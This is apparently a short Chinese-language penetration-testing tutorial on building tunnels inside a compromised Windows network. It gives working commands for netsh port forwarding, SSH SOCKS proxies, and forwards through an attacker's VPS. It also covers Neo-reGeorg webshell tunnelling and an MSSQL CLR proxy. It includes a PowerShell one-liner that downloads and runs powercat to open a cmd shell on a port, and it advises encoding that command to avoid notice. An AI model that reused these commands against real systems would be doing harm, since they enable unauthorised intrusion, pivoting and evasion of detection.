Mtaun

Windows内网渗透_2.传输通道

2.1、判断出网

ping icmp
curl http
nslookup dns

2.2、netsh端口转发

A机器执行如下命令:
netsh interface portproxy add v4tov4 listenport=5555 connectport=3389 connectaddress=192.168.1.1  protocol=tcp
B机器访问A机器的5555端口,即是192.168.1.1的3389端口

2.3、ssh

ssh一般被拿来登录linux机器,也可以拿来做代理和转发。

a、开启socks代理:
ssh -qTfnN -D 1111 root@1.1.1.1
输入1.1.1.1机器密码,本地利用proxychains等类似工具连接本地的1111端口的sock5连接即可代理1.1.1.1的网络。

b、控制A、B机器,A能够访问B,且能出网,B能够访问C,但不能出网,A不能访问C:
A机器执行:
ssh -CNfg -L 2121:CIP:21 root@BIP
输入BIP机器密码,访问A的2121端口即是访问CIP的21端口。

c、控制A机器,A能够访问B:
A机器执行:
ssh -CNfg -R 2121:BIP:21 root@hackervps
输入黑客vps密码,访问黑客vps的2121端口即是访问BIP的21端口。

2.4、Neo-reGeorg

https://github.com/L-codes/Neo-reGeorg

python neoreg.py generate -k password
python3 neoreg.py -k password -u http://xx/tunnel.php

2.5、powercat

powercat是一款ps版nc。可以本地执行,也可以远程下载执行,远程执行命令如下:

powershell”IEX (New-Object System.Net.Webclient).DownloadString(‘https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1’);powercat-l -p 8000 -e cmd”

然后远程连接执行命令即可。如果嫌弃该命令太暴露,可以对其进行编码。

2.6、mssql

当目标机器只开放mssql时,我们也可以利用mssql执行clr作为传输通道。

环境如下:

图片

工具项目地址:

https://github.com/blackarrowsec/mssqlproxy

2.7、pystinger

https://github.com/FunnyWolf/pystinger